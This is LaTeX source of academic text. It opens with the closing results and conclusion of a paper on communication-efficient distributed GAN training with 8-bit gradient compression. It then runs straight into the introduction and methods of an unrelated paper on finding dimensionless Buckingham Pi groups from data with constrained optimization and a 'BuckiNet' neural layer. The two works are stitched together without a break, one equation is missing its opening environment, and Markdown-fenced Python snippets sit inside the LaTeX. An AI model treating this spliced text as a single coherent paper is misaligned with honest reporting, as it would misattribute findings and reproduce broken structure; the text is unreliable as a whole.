to evaluate all methods, where a higher Inception Score and a lower Fr{\'e}chet Inception Distance indicate better results.
The Inception Score and Fréchet Inception Distance values of three methods on the CIFAR10 and CelebA datasets
are shown in Figures~\ref{fig:results_cifa10} and \ref{fig:results_celeba}.
The results on both datasets show that CPOAdam achieves higher Inception Scores and
lower Fr{\'e}chet Inception Distances throughout training.
We also notice that our method, using gradients at $1/4$ of full precision, produces results comparable
to CPOAdam with full-precision gradients:
at most a $0.6$ decrease in Inception Score and
at most a $30$ increase in Fr{\'e}chet Inception Distance on the CIFAR10 dataset,
and at most a $0.5$ decrease in Inception Score and
at most a $40$ increase in Fr{\'e}chet Inception Distance on the CelebA dataset.
Finally, we show the speedup results of our method on the CIFAR10 and CelebA datasets in Figure~\ref{fig:speedup},
which shows that our method is able to improve the speedup of training GANs, and
the improvement becomes more significant as the data size increases.
With 32 workers, our method with $8$-bit gradients
achieves a significant improvement
on the CIFAR10 and CelebA datasets compared to CPOAdam.
This matches our expectations, since transmitting 8-bit gradients requires far less data than transmitting 32-bit gradients.
\section{Conclusion}
\label{sec:conclusions}
In this paper, we have proposed a distributed optimization algorithm for training GANs.
The new method reduces the communication cost via gradient compression,
and the error-feedback operations we designed are used to compensate for the bias caused
by the compression operation and to ensure non-asymptotic convergence.
We have theoretically proved the non-asymptotic convergence of the new method,
with the introduction of a general $\delta$-approximate compressor.
Moreover, we have proved that the new method has a linear speedup in theory.
The experimental results show that our method produces results comparable to the distributed method without quantization,
with only slight performance degradation.
Although our new method has a linear speedup in theory,
the cost of gradient synchronization affects its performance in practice.
Introducing asynchronous gradient communication would break the synchronization barrier and
improve the efficiency of our method in real applications. We leave this for future work.
\section{Introduction}
Dimensional analysis is based on the simple idea that physical laws do not depend on the units of measurements.
As a consequence, any function that expresses a physical law has the fundamental property of so-called {\em generalized homogeneity}~\cite{barenblatt1996scaling} and does not depend on the observer.
Although such concepts of dimensional analysis go back to the time of Newton and Galileo~\cite{sterrett2017physically}, it was formalized mathematically by the pioneering contributions of Edgar Buckingham in 1914~\cite{buckingham1914physically}.
Specifically, Buckingham proposed a principled method for extracting the most general form of physical equations by simple dimensional considerations of the seven fundamental units of measurement: length (meter), mass (kg), time (seconds), electric current (Ampere), temperature (Kelvin), amount of substance (mole), and luminous intensity (candela).
From electromagnetism to gravitation, measurements can be directly related to the seven fundamental units; for instance, force is measured in newtons, i.e. kg$\cdot$m/s$^2$, and electric potential in volts, i.e. kg$\cdot$m$^2$/(s$^3$$\cdot$A).
The resulting Buckingham Pi theorem was originally contextualized in terms of physically similar systems~\cite{buckingham1914physically}, or groups of parameters that related similar physics.
In modern times, rapid advancements in measurement and sensor technologies have produced data of diverse quantities at almost any spatial and temporal scale.
This has engendered a renewed consideration of the Buckingham Pi theorem in the context of data-driven modeling~\cite{del2019lurking,jofre2020data,fukami2021robust,xie2021data}.
Specifically, as shown here, physics-informed machine learning algorithms can be constructed to automate the principled approach advocated by Buckingham for the discovery of the most general and parsimonious form of physical equations possible from measurements alone.
Buckingham Pi theory was critically important in the pre-computer era. Indeed, the discovery of key dimensionless quantities was considered a fundamental result, as it often uncovered the self-similarity structure of the solution along with parametric dependencies and symmetries. In fluid dynamics alone, for instance, there are numerous named dimensionless parameters that are discovered through the Buckingham Pi reduction, including the Reynolds, Prandtl, Froude, Weber, and Mach numbers.
Scaling and dimensional analysis continue to provide a robust starting point for understanding both complex and basic physical phenomena, like the physics of wrinkling~\cite{Cerda2003prl}, chaotic patterns in Rayleigh-B\'enard convection~\cite{Morris1993prl}, the structure of drops falling from a faucet \cite{Shi1994science}, spontaneous pattern formation by self-assembly~\cite{Grzybowski2000nature}, and osmotic spreading of biofilms~\cite{Seminara2012pnas}.
In practice, many dimensionless groups naturally arise from ratios of domain averaged terms in physically meaningful equations that are required to be dimensionally homogeneous. When equations are non-dimensionalized, dimensionless terms that are small on average relative to others can be treated as perturbations, thus providing insights into the qualitative structure of the solution and simplifying the problem of finding it. More importantly, Buckingham Pi provides the potential for an {\em order parameter} description~\cite{Cross1993} that determines the qualitative structure of the solution and its bifurcations without recourse to the full-state equations~\cite{callaham2021learning}.
These order parameters form the basis for casting problems into normal forms that reveal physical symmetries and can potentially be solved analytically~\cite{guckenheimer_holmes, Yair2017pnas, kalia2021learning}.
Even when governing equations are unknown, Buckingham Pi establishes a dimensionally consistent relationship between the input parameters/variables and output predictions which help constrain models and prevent over-fitting.
The rise of scientific computing in the 1980s made it possible to numerically integrate highly nonlinear ordinary and partial differential equations, without the need for analytic simplifications provided by dimensional analysis.
More recently, machine learning algorithms have shown promise in discovering scientific laws~\cite{schmidt2009distilling}, differential equations~\cite{brunton2016discovering, rudy2017data, lu2021learning}, and deep network input-output function approximations~\cite{raissi2019physics, karniadakis2021physics, Noe2019science} from simulation and experimental data alone, with considerable progress in the field of fluid mechanics~\cite{Brenner2019prf,Duraisamy2019arfm,Brunton2020arfm,Sonnewald2021}.
Particularly, unsupervised learning techniques have recently made significant progress in distilling physical data into interpretable dynamical models that automate the scientific process \cite{Kaiser2021, Sonnewald2019ess, wu2018deep, Champion2019pnas, bakarji2022discovering}.
However, these methods typically do not take into account the units of their training data, even though doing so can significantly constrain the hypothesis class to physically meaningful solutions.
{Principal component analysis} (PCA), which is a leading data analysis method~\cite{Brunton2019book}, sidesteps the units of measurement entirely by setting the mean of each measurement variable to zero and its variance to unity.
However, there are more sophisticated methods for explicitly considering measurement units.
Active subspaces provides a principled algorithmic method for extracting dimensionless numbers from experimental and simulation data~\cite{constantine2017data}, having successfully been demonstrated to discover dimensionless numbers in particle-laden turbulent flows~\cite{jofre2020data}.
In a related line of work, statistical null-hypothesis testing has been used alongside the Buckingham Pi theorem to find hidden variables in dimensional experimental data~\cite{del2019lurking}.
Dimensional analysis has also been used for a physics-inspired symbolic regression algorithm that discovers physics formulas from data~\cite{udrescu2020ai} and to improve neural network models~\cite{gunaratnam2003improving}.
Data-driven dimensional analysis has also been applied to model turbulence data~\cite{fukami2021robust}.
Machine learning algorithms that use sparse identification of differential equation to discover dimensionless groups and scaling laws that best collapse experimental data have also been recently proposed~\cite{xie2021data}.
In this study, we address the problem of automatic discovery of dimensionless groups from available experimental or simulation data using the Buckingham Pi theorem as a constraint.
Importantly, although the Buckingham Pi theorem provides a step-by-step method for finding dimensionless groups directly from the input variables and parameters, its solution is not unique.
Thus it relies on intuition and experience with the physical problem at hand.
If the underlying equations are available, finding dimensionless groups is constrained by the form of the equation and they are computed by dividing the \emph{system average} magnitude of every term by a reference term.
Even then, the problem of determining the relevant dimensionless numbers depends on experience.
Our aim is to leverage symmetries in the data to inform the algorithm of which set of dimensionless groups controls the behavior (e.g. the Reynolds number controls the turbulence of a flow field).
We develop three methods that find the most physically meaningful Pi groups (See Fig.~\ref{fig:approaches}), assumed to be the most predictive of the dependent variables.
The first method is a constrained optimization that fits independent-variable and parameter inputs to predictions while satisfying the Buckingham Pi theorem as a hard constraint.
The second method uses a Buckingham Pi (nullspace) constraint on the first hidden layer of a deep network that fits input parameters to output predictions.
And the third method uses SINDy~\cite{brunton2016discovering, rudy2017data} to constrain available dimensionless groups to be coefficients in a sparse differential equation.
The latter method has the added benefit of discovering a parametric (dimensionless) differential equation that describes the data, thus simultaneously generalizing the SINDy method.
We apply these methods to three problems: the rotating hoop, the Blasius boundary layer, and the Rayleigh-B\'enard problem.
\begin{figure}[t]
\begin{center}
\includegraphics[width=.85\textwidth]{figures/approaches2.pdf}
\caption{Two approaches for non-dimensionalization. In the absence of known governing equations, scientists use the Buckingham Pi theorem to infer dimensionless groups $\bm \pi_{\tilde{\mathbf p}}$ from units of input variables and parameters. When the equation is known, normalizing variables and parameters by system-specific constants and/or averages gives rise to dimensionless groups as equation coefficients.}
\label{fig:approaches}
\end{center}
\end{figure}
\section{Buckingham Pi Problem Formulation}\label{sec:problem-statement}
Let $\mathbf{q}= f(\mathbf p)$ be a mapping where $\mathbf p \in \mathbb R^n$ is a vector of input measurement parameters and variables, and $f$ is a function that maps $\mathbf p$ to a set of dependent quantities of interest $\mathbf{q} \in \mathbb R^k$. One generally seeks a predictor $f$ that maximizes the size of the set of possible measurable parameters and variables $\mathcal P$, for which the prediction error $\varepsilon = \| f(\mathbf p) - \mathbf{q} \|$ is minimized, with $\mathbf p, \mathbf q \in \mathcal P$. The function $f$ is typically the solution of an initial and/or boundary value problem with known variables and parameters $\mathbf p$ and unknown solution $\mathbf{q}$, all of which have physical dimensions [units].
The Buckingham Pi theorem states that there exists a set of dimensionless quantities $\bm \pi = (\bm \pi_p, \bm \pi_q)$, also known as $\bm \pi$-groups, such that the dimensionless input parameters/variables $\bm \pi_p \in \mathbb R^{n'}$ span the full dimensionless solution space $\bm \pi_q \in \mathbb R^{k'}$, with $n' \le n$ and $k' \le k$~\cite{buckingham1914physically}. Furthermore, the theorem determines the value of $d' = n'+k'$ given the units of the measurement variables and parameters.
A probabilistic corollary of the Buckingham Pi theorem is that the input-output data $(\mathbf p, \mathbf q)$ can be projected on a lower dimensional space with basis $(\bm \pi_p, \bm \pi_q)$ without compromising the prediction error $\varepsilon$, such that,
\begin{equation}
\left\| \mathbf{q} - f(\mathbf p) \right\| < \varepsilon \quad \rightarrow \quad \left\| \bm \pi_q - \psi(\bm \pi_p) \right\| < \varepsilon,
\end{equation}
where $\psi$ is an unknown function that can be approximated from available data.
However, the Buckingham Pi theorem does not provide any information on the properties of $\psi$ or its relationship with the Pi groups. The theorem generally assumes $\mathbf p$, $\mathbf q$, and $f$ to be deterministic without considering the optimality of a dimensionless basis with the generalization properties of the mapping $f$.
In a data-driven statistical setting, we assume that the inputs $\mathbf p$ and outputs $\mathbf q$ are sampled from a distribution function $F_{\mathbf p \mathbf q}(P, Q)$, and that $f$ is an optimal mapping in a given class of functions. In this context, we generally seek the most physically meaningful transformation $(\mathbf{p}, \mathbf q) \rightarrow (\bm \pi_p, \bm \pi_q)$ that provides the best fit $\bm \pi_q = \psi(\bm \pi_p)$, assuming $\psi$ to be an optimal predictor over a pre-determined hypothesis class $\mathcal H$. Accordingly, we posit the following hypothesis
\begin{hypothesis}\label{main-hyp}
Given a set of input and output measurement pairs $\tilde{\mathbf p} = (\mathbf p, \mathbf q)$, the most physically meaningful dimensionless basis $\bm \pi^*$ is the optimal coordinate transformation $\tilde{\mathbf p} \rightarrow \bm \pi^*$ that satisfies the minimization problem
\begin{equation}\label{eq:optim-thrm}
\bm \pi^* = \underset{\bm \pi}{\argmin} \left( \underset{\psi}{\min} \left\| \bm \pi_q - \psi(\bm \pi_p)\right\|^2_2 \right),
\end{equation}
where \emph{physical meaningfulness} is defined as the dimensionless group's ability to simplify an equation in relevant regimes and provide a scaling that collapses the input-output solution space to a lower dimension.
\end{hypothesis}
Note that defining \emph{physical meaningfulness} often depends on the historical and scientific context, which makes the above hypothesis subject to interpretation. In some cases, theoretical and experimental tradition narrows a field of study down to a set of well-known dimensionless numbers with which known regimes and behaviors are associated (e.g. the Reynolds number quantifying turbulence in fluid mechanics). In particular, when analytical models and equations are available, dimensionless numbers that arise naturally from the relative magnitudes of different terms are physically significant because they quantify changes in the qualitative nature of the solution. Hypothesis~\ref{main-hyp} proposes a new approach for defining \emph{physical meaningfulness}, for which we provide evidence in Sec.~\ref{sec:methods}. The purpose of the proposed methods is to discover dimensionless groups in contexts where data is available but analytical models are not known.
This hypothesis is further constrained by the functional relationship between $\bm \pi$ and $\tilde{\mathbf p}$, given by
\pi_j = \prod_{i=1}^{d} \tilde{p}_i^{\Phi_{ij}},
\end{equation}
where $\Phi_{ij}$ are unknown parameters that are chosen to make $\pi_j$ dimensionless.
Let $\Omega()$ be a function that maps a measurable quantity $\tilde p_i$ to a vector containing the powers of its basic dimensions (i.e. mass $M$, length $L$, time $T$, etc.). For example, if one chooses $[M, L, T]$ as the basic dimensions, then the units of a force are $[F] = ML/T^2$, and $\Omega(F) = [1, 1, -2]^T$. Let $\phi()$ be a function that maps a dimensionless group to a vector that corresponds to the powers of the input parameters $\mathbf p$ such that $\phi(\pi_j) = [\Phi_{1j}, \Phi_{2j}, \ldots, \Phi_{dj}]^T$, where $d=n+k$.
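The bookkeeping behind $\Omega()$ is straightforward to implement; the following minimal sketch (the names and data layout are illustrative assumptions) stores each quantity's units as integer powers of the chosen base dimensions:

```python
# Base dimensions chosen as (mass, length, time).
BASE = ("M", "L", "T")

def Omega(units):
    """Map a units dict such as {'M': 1, 'L': 1, 'T': -2} to the
    exponent vector over the base dimensions."""
    return [units.get(b, 0) for b in BASE]

force = {"M": 1, "L": 1, "T": -2}       # [F] = M L / T^2
velocity = {"L": 1, "T": -1}            # [U] = L / T
print(Omega(force), Omega(velocity))    # [1, 1, -2] [0, 1, -1]
```

Stacking these exponent vectors column-wise yields the units matrix $\bm D$ defined next.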
The Buckingham Pi theorem~\cite{buckingham1914physically} constrains $\phi(\pi_i)$ to be in the null-space of the units matrix
\begin{equation}
\bm D = [\bm D_p, \bm D_q] =
\left[
\begin{array}{ccccccc}
\rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & & \rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & & \rule[-1ex]{0.5pt}{2.5ex} \\
\Omega( p_1) & \Omega( p_2) & \ldots & \Omega( p_n) & \Omega( q_1) & \ldots & \Omega( q_k) \\
\rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & & \rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & & \rule[-1ex]{0.5pt}{2.5ex}
\end{array}
\right],
\end{equation}
such that
\begin{equation}\label{eq:nulleqn}
\bm D \phi(\pi_i) = \mathbf 0, \quad \forall i \in \{1,\ldots, d\}.
\end{equation}
Here, we assume that the number of dimensional and dimensionless predictions is equal, i.e. $|\bm \pi_q| = |\mathbf q| = k$, which is often the case; we later propose methods for relaxing this assumption.
The Buckingham Pi theorem determines the number of Pi-groups to be $d' = d - \text{rank}(\bm D)$. The main shortcoming of the theorem is its inability to provide a unique set of $d'$ dimensionless numbers. In practice, additional heuristic constraints are required to solve for the unknowns $\Phi_{ij}$.
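For illustration, the nullspace constraint~\eqref{eq:nulleqn} can be checked numerically. The sketch below uses a standard textbook example (drag on a sphere, which is not one of the case studies in this paper): it builds the units matrix $\bm D$ over the base dimensions $(M, L, T)$, confirms that the number of Pi groups is $d - \text{rank}(\bm D)$, and verifies that the exponent vectors of the familiar Reynolds number and drag coefficient lie in the nullspace of $\bm D$:

```python
import numpy as np

# Dimensional matrix for drag on a sphere moving through a fluid.
# Rows: powers of the base dimensions (M, L, T).
# Columns: the measured quantities (F, rho, U, D, mu).
Dmat = np.array([
    [ 1,  1,  0, 0,  1],   # mass
    [ 1, -3,  1, 1, -1],   # length
    [-2,  0, -1, 0, -1],   # time
], dtype=float)

# Buckingham Pi: the number of independent dimensionless groups is
# d - rank(D); their exponent vectors span the nullspace of D.
rank = np.linalg.matrix_rank(Dmat)
n_groups = Dmat.shape[1] - rank
print(n_groups)   # 2

# A candidate exponent vector phi defines a valid Pi group iff D @ phi = 0,
# e.g. Reynolds number Re = rho*U*D/mu and drag coefficient
# C_D = F / (rho * U**2 * D**2):
Re = np.array([0, 1, 1, 1, -1], dtype=float)
Cd = np.array([1, -1, -2, -2, 0], dtype=float)
print(np.allclose(Dmat @ Re, 0), np.allclose(Dmat @ Cd, 0))   # True True
```

A symbolic nullspace basis (e.g. via SymPy's \texttt{Matrix.nullspace()}) would return one of infinitely many valid sets of exponents, reflecting the non-uniqueness discussed above.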
\section{Methods}
\label{sec:methods}
We present three methods for discovering dimensionless groups from data. The main features that differentiate them are
\begin{enumerate}
\item Imposing hard, soft, or no constraints on the null-space of $\bm D$ to ensure that the Pi-groups are dimensionless according to equation~\eqref{eq:nulleqn}.
\item The type of input-output function approximation $\psi$: e.g. neural network, non-parametric function, or differential equation.
\end{enumerate}
Let $\{\tilde{\mathbf{p}}^{(i)}\}_{i=1}^m \equiv \{(\mathbf p^{(i)}, \mathbf q^{(i)})\}_{i=1}^m$ be a set of $m$ measurement pairs of the inputs vector $\mathbf p^{(i)} \in {\mathbb R}^n$ and their corresponding output predictions $\mathbf q^{(i)} \in {\mathbb R}^k$, with index $i$.
We define the input parameter matrix $\boldsymbol{P} \in {\mathbb R}^{m \times n}$ and the output prediction matrix $\boldsymbol{Q} \in {\mathbb R}^{m \times k}$ as the row-wise concatenation of all measurements $\mathbf p^{{(i)}}$ and $\mathbf q^{{(i)}}$ respectively. We also define $\tilde{\boldsymbol{P}} = [\bm P, \bm Q] \in {\mathbb R}^{m \times d}$ as the column-wise concatenation of $\boldsymbol{P}$ and $\boldsymbol{Q}$.
The Pi-groups powers matrix is given by
\begin{equation}
\bm \Phi =
\left[
\begin{array}{cccc}
\rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & & \rule[-1ex]{0.5pt}{2.5ex} \\
\phi(\pi_1) & \phi(\pi_2) & \ldots & \phi(\pi_{d'}) \\
\rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & & \rule[-1ex]{0.5pt}{2.5ex}
\end{array}
\right] \in {\mathbb R}^{d \times {d'}},
\end{equation}
such that the equation $\bm D \bm \Phi = \mathbf{0}$ is satisfied according to Eq.~\eqref{eq:nulleqn}. Similarly, we define $\bm \Phi_p \in {\mathbb R}^{n\times n'}$ to contain the $n'$ dimensionless groups corresponding to the $n$ input parameters/variables $\mathbf p$. Equation~\eqref{eq:ptopi} can be written as $\pi_j = \exp \left\{ \sum_{i=1}^d \Phi_{ij}\log(\tilde p_i) \right\}$, corresponding to the matrix form
\begin{equation}\label{eq:ptopi-mat}
\boldsymbol{\Pi} = \exp \left( \log(\boldsymbol{\tilde{P}}) \boldsymbol{\Phi} \right),
\end{equation}
where each row in $\boldsymbol{\Pi} \in \mathbb R^{m\times d'}$ corresponds to the values of the dimensionless groups $\bm \pi^{(i)}$ for a given experiment $i$, and the exponential and logarithm are both taken element-wise. We also define the matrix $\bm \Pi_q \in {\mathbb R}^{m \times k'}$ to be the data matrix of the output Pi-groups $\bm \pi_q$ and $\bm \Pi_p \in {\mathbb R}^{m \times n'}$ to be the data matrix of the input Pi-groups $\bm \pi_p$, such that $\bm \Pi = [\bm \Pi_p, \bm \Pi_q]$.
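In code, equation~\eqref{eq:ptopi-mat} is a single matrix operation on positive measurement data; the following sketch (our own, using an illustrative Reynolds-number group) computes $\bm \Pi$ from $\tilde{\bm P}$ and $\bm \Phi$.

```python
import numpy as np

def pi_groups(P_tilde, Phi):
    """Map dimensional data to Pi-group values: Pi = exp(log(P_tilde) @ Phi).

    P_tilde : (m, d) matrix of positive dimensional measurements.
    Phi     : (d, d') matrix whose columns are Pi-group exponent vectors.
    """
    return np.exp(np.log(P_tilde) @ Phi)

# Example: Reynolds number Re = rho * U * L / mu from one measurement
# of (rho, U, L, mu).
P_tilde = np.array([[1000.0, 2.0, 0.5, 1e-3]])
Phi = np.array([[1.0], [1.0], [1.0], [-1.0]])
Pi = pi_groups(P_tilde, Phi)  # ≈ 1e6, the Reynolds number
```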
For example, consider the pendulum shown in Fig.~\ref{fig:approaches}.
If we define the inputs to be gravity $g$, mass $m$, length $L$, and time $t$, and the output to be the angle $\alpha$, then the dimensional input and output parameter vectors $\mathbf p$ and $\mathbf q$ are
\begin{equation}
\mathbf p =
\begin{bmatrix}
g & m & L & t
\end{bmatrix}^T, \qquad
\mathbf q =
\begin{bmatrix} \alpha \end{bmatrix}.
\end{equation}
The corresponding units matrices $\bm D_p$ and $\bm D_q$ constructed with basic dimensions mass, length, and time are
\begin{subequations}
\begin{align}
\bm D_p &=
\left[
\begin{array}{ccccc}
\rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} \\
\Omega( g ) & \Omega( m ) & \Omega( L ) & \Omega( t ) \\
\rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex} & \rule[-1ex]{0.5pt}{2.5ex}
\end{array}
\right]
= \left[
\begin{array}{ccccc}
0 & 1 & 0 & 0 \\
1 & 0 & 1 & 0 \\
-2 & 0 & 0 & 1
\end{array}
\right] \\
\bm D_q &= \left[
\begin{array}{c}
\rule[-1ex]{0.5pt}{2.5ex} \\
\Omega(\alpha) \\
\rule[-1ex]{0.5pt}{2.5ex}
\end{array}
\right] = \left[
\begin{array}{c}
0 \\
0 \\
0
\end{array}
\right].
\end{align}
\end{subequations}
Note that the angle $\alpha$ is already dimensionless, so $\Omega(\alpha)$ is the zero vector.
A possible $\bm \Phi$ matrix consisting of columns spanning the nullspace of $\bm D = [\bm D_p, \bm D_q]$ is
\begin{equation}
\bm \Phi = \left[
\begin{array}{cc}
1 & 0 \\
0 & 0 \\
-1 & 0 \\
2 & 0 \\
0 & 1
\end{array}
\right]
\quad
\text{s.t.}
\quad
\bm \Phi_p = \left[
\begin{array}{c}
1 \\
0 \\
-1 \\
2 \\
0
\end{array}
\right],
\quad
\bm \Phi_q = \left[
\begin{array}{c}
0 \\
0 \\
0 \\
0 \\
1
\end{array}
\right].
\end{equation}
Then $\pi_q = \alpha$ and $\pi_p = gt^2/L$, so that the input/output relationship is some function $\alpha = \psi(gt^2/L)$. We solve this example using a data-driven method in Sec.~\ref{sec:results-pendulum}.
In this case we know from basic mechanics that $\psi$ is sinusoidal in $\sqrt{\pi_p}$ for small $\alpha$, but for more complicated problems it may not be obvious what the appropriate $\bm \Phi$ and $\psi$ are.
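The pendulum units matrix above can be checked numerically; the snippet below verifies that the columns of $\bm \Phi$ lie in the nullspace of $\bm D$ and that the Buckingham Pi count gives $d' = 2$.

```python
import numpy as np

# Units matrix for (g, m, L, t, alpha) with basic dimensions [M, L, T],
# matching the pendulum example above.
D = np.array([
    [0, 1, 0, 0, 0],   # M
    [1, 0, 1, 0, 0],   # L
    [-2, 0, 0, 1, 0],  # T
])

# Candidate Pi-group exponents: pi_p = g t^2 / L and pi_q = alpha.
Phi = np.array([
    [1, 0],
    [0, 0],
    [-1, 0],
    [2, 0],
    [0, 1],
])
assert (D @ Phi == 0).all()  # both columns lie in the nullspace of D
```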
This section introduces three methods to simultaneously identify the nondimensionalization $\bm \Phi$ and an approximation of $\psi$ from a set of experimental or simulation data.
In this data-driven context, \eqref{eq:ptopi-mat} can be combined with the nullspace constraint, $\bm D \bm \Phi = \mathbf{0}$, to optimize $\psi$ over a pre-defined hypothesis class given the measurement data.
\subsection{Constrained optimization}
\label{sec:constrained-opt}
Equation~\eqref{eq:optim-thrm} can be cast as a constrained optimization problem, with a fitting function $\psi$ that can be either parametric or non-parametric. The input Pi-groups powers matrix $\bm \Phi_p$ maps the input parameters/variables to the dimensionless groups through equation~\eqref{eq:ptopi-mat}, and the constraint of the optimization is given by equation~\eqref{eq:nulleqn}. The choice of the hypothesis class of $\psi$ is assumed to be arbitrary in this formulation, notwithstanding its effect on the accuracy of the results and the success of the method.
In this setup, we assume that the outputs, $\mathbf q$, can be non-dimensionalized by known constants of motion (i.e. $\bm \Pi_q$ is known). Accordingly, the resulting optimization problem is given by
\begin{equation}
\label{eq:constrained-opt}
\bm{\check{\Phi}_p} = \argmin_{\boldsymbol{\Phi}_p} \left\| \boldsymbol{\Pi}_q - \psi(\exp \left( \log(\boldsymbol{P}) \boldsymbol{\Phi}_p \right)) \right\|_2 + \lambda_1 \left\| \boldsymbol{\Phi}_p \right\|_1 + \lambda_2 \left\| \boldsymbol{\Phi}_p \right\|_2, \quad \text{s.t.} \quad \boldsymbol{D}_p \boldsymbol{\Phi}_p = \mathbf{0},
\end{equation}
where the $\ell_1$ regularization enforces sparsity (typical in dimensionless numbers) and the $\ell_2$ regularization encourages smaller powers.
An example application of this approach that uses kernel ridge regression as a non-parametric approximation of $\psi$ is given in Sec.~\ref{sec:results-blasius}.
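To make the structure of~\eqref{eq:constrained-opt} concrete, the sketch below solves a pendulum-style toy version of the problem with SciPy's trust-region solver; the data, the low-order polynomial stand-in for the non-parametric $\psi$, and the parameter ranges are all our own illustrative choices, not the settings used in the results.

```python
import numpy as np
from scipy.optimize import minimize, LinearConstraint

rng = np.random.default_rng(0)

# Toy data: inputs (g, L, t) with basic dimensions [L, T]; the true
# group is pi_p = g t^2 / L and the dimensionless output is
# pi_q = cos(sqrt(pi_p)).
P = np.column_stack([
    rng.uniform(9.0, 10.0, 200),   # g  [L/T^2]
    rng.uniform(0.5, 2.0, 200),    # L  [L]
    rng.uniform(0.1, 1.0, 200),    # t  [T]
])
Pi_q = np.cos(np.sqrt(P[:, 0] * P[:, 2] ** 2 / P[:, 1]))

D_p = np.array([[1, 1, 0],    # length powers of (g, L, t)
                [-2, 0, 1]])  # time powers

def loss(phi):
    # A low-order polynomial fit stands in for the non-parametric psi.
    pi_p = np.exp(np.log(P) @ phi)
    coeffs = np.polyfit(pi_p, Pi_q, deg=5)
    return np.sum((np.polyval(coeffs, pi_p) - Pi_q) ** 2)

res = minimize(loss,
               x0=np.array([1.0, -1.0, 2.0]) + 0.1 * rng.standard_normal(3),
               method="trust-constr",
               constraints=[LinearConstraint(D_p, 0.0, 0.0)])
phi = res.x / res.x[0]   # scale so that the power of g is one
```

The `LinearConstraint` with zero lower and upper bounds enforces $\bm D_p \bm \Phi_p = \mathbf 0$ as an equality; any feasible solution is a scalar multiple of $(1, -1, 2)$, i.e. a power of $g t^2 / L$.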
\subsection{BuckiNet: non-dimensionalization with a neural network}
The unknown function $\psi$ is generally nonlinear and can be high dimensional. Given input-output data, in the absence of a governing equation, a deep neural network is a natural candidate for approximating $\psi$.
Equation~\eqref{eq:ptopi-mat} can be naturally integrated in a deep learning architecture by first applying a $\log()$ transform to the inputs $\mathbf p$, then using an exponential activation function at the output of the first layer. This makes $\bm \Phi_p$ the fitting weights of the first layer, as shown in Fig.~\ref{fig:neural-nondim}. We call this layer the BuckiNet.
When negative input data are given, they must be pre-processed so that the initial $\log()$ operation is well defined. In most cases, a simple shift of the data into the positive domain is sufficient.
\begin{figure}[t]
\begin{center}
\includegraphics[width=\textwidth]{figures/buckinet.pdf}
\caption{Illustration of the BuckiNet layer for the rotating hoop problem (described in Sec.~\ref{sec:rotating-hoop}). The dimensionless loss imposes a soft Buckingham Pi constraint from equation~\eqref{eq:nulleqn}, and the BuckiNet layer satisfies equation~\eqref{eq:ptopi}. In this example, the output is given by the three dominant time modes $\mathbf v$ of the output $x(t)$ rather than taking the time $t$ as an input.}
\label{fig:neural-nondim}
\end{center}
\end{figure}
This technique offers many advantages. First, the BuckiNet layer implicitly performs an unsupervised dimensionality reduction without any adjustment to the overall architecture of the deep network. This results in better generalization properties and faster optimization thanks to a loss-less reduction in the number of fitting parameters. The number of nodes in the first hidden layer is $n'$, as determined by the Buckingham Pi theorem. Second, the optimal weights of the first layer, $\bm \Phi_p$, correspond to the powers of dimensionless numbers that are most predictive of the solution. Third, the BuckiNet can be easily added to deep learning algorithms that fit input-output measurement data with a few lines of code in TensorFlow or PyTorch.
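As an illustration, here is a minimal, framework-agnostic NumPy sketch of the BuckiNet forward pass; in PyTorch the same computation is a bias-free \texttt{nn.Linear} applied to the $\log$-inputs followed by an exponential activation.

```python
import numpy as np

def buckinet_forward(P, Phi_p):
    """First (BuckiNet) layer: Pi_p = exp(log(P) @ Phi_p).

    Phi_p plays the role of the layer weights; in PyTorch this is a
    bias-free nn.Linear applied to log(P), followed by torch.exp.
    """
    return np.exp(np.log(P) @ Phi_p)

# Pendulum-style inputs (g, L, t) and the single group g t^2 / L.
P = np.array([[9.8, 1.0, 0.5],
              [9.8, 2.0, 1.0]])
Phi_p = np.array([[1.0], [-1.0], [2.0]])
Pi_p = buckinet_forward(P, Phi_p)
# Pi_p[:, 0] equals g * t**2 / L row-wise; the downstream dense layers
# approximating psi act on Pi_p instead of the raw inputs.
```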
The BuckiNet architecture on its own does not guarantee a dimensionless combination of the input parameters. Whether the network discovers a dimensionless basis without any constraint is discussed in Sec.~\ref{sec:results-pendulum}. To explicitly account for the constraint in equation~\eqref{eq:nulleqn}, we add a null-space loss on $\bm \Phi_p$
\begin{equation}
\mathcal L_\text{null} = \left\| \bm D_p \bm \Phi_p \right\|^2_2,
\end{equation}
in the loss function. Therefore, the total loss is given by
\begin{equation}
\mathcal L = \left\| \boldsymbol{\Pi}_q - \psi(\exp \left( \log(\boldsymbol{P}) \boldsymbol{\Phi}_p \right)) \right\|_2 + \lambda \| \bm D_p \bm \Phi_p \|_2 + \text{reg}.
\end{equation}
In contrast to the constrained optimization problem proposed in the previous section, this method minimizes the null-space residual of equation~\eqref{eq:nulleqn} but does not satisfy it exactly. However, this proves to be sufficient for finding Pi-groups with sparse and approximately rational exponents, as shown in Sec.~\ref{sec:rotating-hoop}. The regularization term includes the $\ell_2$ loss $\| \bm \Phi_p \|_2$, which promotes dimensionless groups with lower powers, and the $\ell_1$ loss $\| \bm \Phi_p \|_1$, which promotes simple groups that involve as few input variables/parameters as possible.
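The null-space penalty is one line in practice; the check below (our own toy example with pendulum-style inputs $(g, L, t)$) shows that it vanishes exactly for a dimensionless group and is positive otherwise.

```python
import numpy as np

def nullspace_loss(D_p, Phi_p):
    """Soft Buckingham Pi penalty || D_p @ Phi_p ||_2^2, summed over groups."""
    return float(np.sum((D_p @ Phi_p) ** 2))

D_p = np.array([[1, 1, 0],    # length powers of (g, L, t)
                [-2, 0, 1]])  # time powers
loss_good = nullspace_loss(D_p, np.array([[1.0], [-1.0], [2.0]]))  # g t^2 / L
loss_bad = nullspace_loss(D_p, np.array([[1.0], [-1.0], [1.0]]))   # g t / L
```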
